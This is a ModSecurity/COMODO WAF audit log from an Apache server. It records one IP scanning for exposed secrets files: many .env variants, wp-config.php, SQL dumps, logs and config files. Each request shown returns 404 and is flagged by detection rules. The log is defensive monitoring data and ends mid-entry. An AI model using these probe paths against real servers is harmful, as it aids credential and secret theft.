"/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/debug.log"] [unique_id "aFCr29yZ4SMykfn97vy3RgAAAAs"] Stopwatch: 1750117339705252 3096 (- - -) Stopwatch2: 1750117339705252 3096; combined=1904, p1=317, p2=1444, p3=24, p4=60, p5=58, sr=92, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --cd16f263-Z-- --f6036c2e-A-- [17/Jun/2025:05:12:20.039390 +0530] aFCr3NyZ4SMykfn97vy3RwAAAAs 185.177.72.204 50394 127.0.0.1 7080 --f6036c2e-B-- GET /admin/dump.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f6036c2e-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6036c2e-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/dump.sql"] [unique_id "aFCr3NyZ4SMykfn97vy3RwAAAAs"] Stopwatch: 1750117340036646 2796 (- - -) Stopwatch2: 1750117340036646 2796; combined=1672, p1=303, p2=1274, p3=21, p4=26, p5=48, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f6036c2e-Z-- --2ae7ea5f-A-- [17/Jun/2025:05:12:20.259975 +0530] aFCr3IoVQnPDyHnl9oPTdAAAAAY 185.177.72.204 50410 127.0.0.1 7080 --2ae7ea5f-B-- GET /admin/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --2ae7ea5f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --2ae7ea5f-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/error.log"] [unique_id "aFCr3IoVQnPDyHnl9oPTdAAAAAY"] Stopwatch: 1750117340257076 2941 (- - -) Stopwatch2: 1750117340257076 2941; combined=1665, p1=364, p2=1201, p3=20, p4=26, p5=54, sr=111, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --2ae7ea5f-Z-- --8afd1a0d-A-- [17/Jun/2025:05:12:21.140347 +0530] aFCr3QGFf516NUzzD0B3KwAAAAg 185.177.72.204 50494 127.0.0.1 7080 --8afd1a0d-B-- GET /admin/logs/error.log HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8afd1a0d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8afd1a0d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/logs/error.log"] [unique_id "aFCr3QGFf516NUzzD0B3KwAAAAg"] Stopwatch: 1750117341137062 3342 (- - -) Stopwatch2: 1750117341137062 3342; combined=2057, p1=382, p2=1544, p3=27, p4=34, p5=70, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8afd1a0d-Z-- --f329f835-A-- [17/Jun/2025:05:12:22.350491 +0530] aFCr3grsPejRtmHkrKLgWwAAAAE 185.177.72.204 50600 127.0.0.1 7080 --f329f835-B-- GET /admin/site.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f329f835-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f329f835-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/site.conf"] [unique_id "aFCr3grsPejRtmHkrKLgWwAAAAE"] Stopwatch: 1750117342347424 3111 (- - -) Stopwatch2: 1750117342347424 3111; combined=1814, p1=339, p2=1383, p3=19, p4=23, p5=50, sr=103, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f329f835-Z-- --8e22403a-A-- [17/Jun/2025:05:12:22.460965 +0530] aFCr3lJfblPUQiSn5r2RdAAAAAA 185.177.72.204 50616 127.0.0.1 7080 --8e22403a-B-- GET /admin/site.sql HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --8e22403a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --8e22403a-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".sql"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/site.sql"] [unique_id "aFCr3lJfblPUQiSn5r2RdAAAAAA"] Stopwatch: 1750117342457717 3291 (- - -) Stopwatch2: 1750117342457717 3291; combined=1970, p1=409, p2=1459, p3=21, p4=27, p5=53, sr=96, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --8e22403a-Z-- --630b571a-A-- [17/Jun/2025:05:12:23.012690 +0530] aFCr39yZ4SMykfn97vy3UAAAAAs 185.177.72.204 50664 127.0.0.1 7080 --630b571a-B-- GET /admin/wp-config.php HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --630b571a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --630b571a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/wp-config.php"] [unique_id "aFCr39yZ4SMykfn97vy3UAAAAAs"] Stopwatch: 1750117343009871 2892 (- - -) Stopwatch2: 1750117343009871 2892; combined=1701, p1=408, p2=1166, p3=19, p4=27, p5=81, sr=118, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --630b571a-Z-- --92c6bb4a-A-- [17/Jun/2025:05:12:23.122015 +0530] aFCr31CTF37l_jAzt4oSygAAAAU 185.177.72.204 50678 127.0.0.1 7080 --92c6bb4a-B-- GET /admin/wp-config.php.old HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --92c6bb4a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --92c6bb4a-H-- Message: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/admin/wp-config.php.old"] [unique_id "aFCr31CTF37l_jAzt4oSygAAAAU"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".php.old"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/admin/wp-config.php.old"] [unique_id "aFCr31CTF37l_jAzt4oSygAAAAU"] Stopwatch: 1750117343119794 2276 (- - -) Stopwatch2: 1750117343119794 2276; combined=1375, p1=318, p2=959, p3=10, p4=17, p5=71, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --92c6bb4a-Z-- --f2ab3538-A-- [17/Jun/2025:05:12:23.342822 +0530] aFCr3wGFf516NUzzD0B3MAAAAAg 185.177.72.204 50700 127.0.0.1 7080 --f2ab3538-B-- GET /ansible/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f2ab3538-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f2ab3538-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/ansible/.env"] [unique_id "aFCr3wGFf516NUzzD0B3MAAAAAg"] Stopwatch: 1750117343339601 3264 (- - -) Stopwatch2: 1750117343339601 3264; combined=1973, p1=380, p2=1489, p3=22, p4=27, p5=54, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f2ab3538-Z-- --3757507d-A-- [17/Jun/2025:05:12:23.453384 +0530] aFCr31JfblPUQiSn5r2RdwAAAAA 185.177.72.204 50708 127.0.0.1 7080 --3757507d-B-- GET /apache.conf HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --3757507d-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --3757507d-H-- Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".conf"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/apache.conf"] [unique_id "aFCr31JfblPUQiSn5r2RdwAAAAA"] Stopwatch: 1750117343450198 3229 (- - -) Stopwatch2: 1750117343450198 3229; combined=1930, p1=331, p2=1488, p3=21, p4=25, p5=65, sr=94, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --3757507d-Z-- --0767d836-A-- [17/Jun/2025:05:12:23.673482 +0530] aFCr3wGFf516NUzzD0B3MQAAAAg 185.177.72.204 50734 127.0.0.1 7080 --0767d836-B-- GET /api-gateway/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --0767d836-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --0767d836-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api-gateway/.env"] [unique_id "aFCr3wGFf516NUzzD0B3MQAAAAg"] Stopwatch: 1750117343670424 3106 (- - -) Stopwatch2: 1750117343670424 3106; combined=1903, p1=394, p2=1417, p3=20, p4=25, p5=47, sr=117, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0767d836-Z-- --7e403555-A-- [17/Jun/2025:05:12:23.783371 +0530] aFCr31JfblPUQiSn5r2ReAAAAAA 185.177.72.204 50736 127.0.0.1 7080 --7e403555-B-- GET /api-gateway/.env.bak HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --7e403555-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --7e403555-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Message: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api-gateway/.env.bak"] [unique_id "aFCr31JfblPUQiSn5r2ReAAAAAA"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/etc/apache2/modsecurity.d/rules/comodo_free/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||198.71.51.75|F|2"] [data ".env.bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] [hostname "198.71.51.75"] [uri "/api-gateway/.env.bak"] [unique_id "aFCr31JfblPUQiSn5r2ReAAAAAA"] Stopwatch: 1750117343780574 2848 (- - -) Stopwatch2: 1750117343780574 2848; combined=1767, p1=361, p2=1290, p3=17, p4=22, p5=77, sr=83, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --7e403555-Z-- --bf9c334b-A-- [17/Jun/2025:05:12:23.893620 +0530] aFCr34oVQnPDyHnl9oPTegAAAAY 185.177.72.204 50742 127.0.0.1 7080 --bf9c334b-B-- GET /api-gateway/.env.dev HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --bf9c334b-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf9c334b-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api-gateway/.env.dev"] [unique_id "aFCr34oVQnPDyHnl9oPTegAAAAY"] Stopwatch: 1750117343890493 3171 (- - -) Stopwatch2: 1750117343890493 3171; combined=1907, p1=368, p2=1443, p3=18, p4=24, p5=54, sr=91, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --bf9c334b-Z-- --5d91e12a-A-- [17/Jun/2025:05:12:24.003766 +0530] aFCr4JVkCcfT-Z8NQYzEygAAAAc 185.177.72.204 50746 127.0.0.1 7080 --5d91e12a-B-- GET /api-gateway/.env.local HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --5d91e12a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --5d91e12a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api-gateway/.env.local"] [unique_id "aFCr4JVkCcfT-Z8NQYzEygAAAAc"] Stopwatch: 1750117344000725 3085 (- - -) Stopwatch2: 1750117344000725 3085; combined=1912, p1=380, p2=1429, p3=21, p4=26, p5=56, sr=93, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5d91e12a-Z-- --63d0426a-A-- [17/Jun/2025:05:12:24.114006 +0530] aFCr4NyZ4SMykfn97vy3UwAAAAs 185.177.72.204 50750 127.0.0.1 7080 --63d0426a-B-- GET /api-gateway/.env.production HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --63d0426a-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --63d0426a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api-gateway/.env.production"] [unique_id "aFCr4NyZ4SMykfn97vy3UwAAAAs"] Stopwatch: 1750117344111071 2977 (- - -) Stopwatch2: 1750117344111071 2977; combined=1743, p1=434, p2=1220, p3=18, p4=23, p5=48, sr=120, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --63d0426a-Z-- --783e1a5f-A-- [17/Jun/2025:05:12:24.224143 +0530] aFCr4AGFf516NUzzD0B3MgAAAAg 185.177.72.204 50762 127.0.0.1 7080 --783e1a5f-B-- GET /api-gateway/.env.staging HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --783e1a5f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --783e1a5f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "198.71.51.75"] [uri "/api-gateway/.env.staging"] [unique_id "aFCr4AGFf516NUzzD0B3MgAAAAg"] Stopwatch: 1750117344221386 2798 (- - -) Stopwatch2: 1750117344221386 2798; combined=1671, p1=385, p2=1198, p3=17, p4=22, p5=48, sr=102, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.8 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --783e1a5f-Z-- --f9d8de7f-A-- [17/Jun/2025:05:12:25.877623 +0530] aFCr4ZWbMc1Q3J_M-mhIhAAAAAo 185.177.72.204 50906 127.0.0.1 7080 --f9d8de7f-B-- GET /api/.env HTTP/1.0 Host: 198.71.51.75 X-Real-IP: 185.177.72.204 Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36 Accept-Encoding: gzip --f9d8de7f-F-- HTTP/1.1 404 Not Found Content-Length: 258 Connection: close Content-Type: text/html; charset=iso-8859-1 --f9d8de7f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 288] 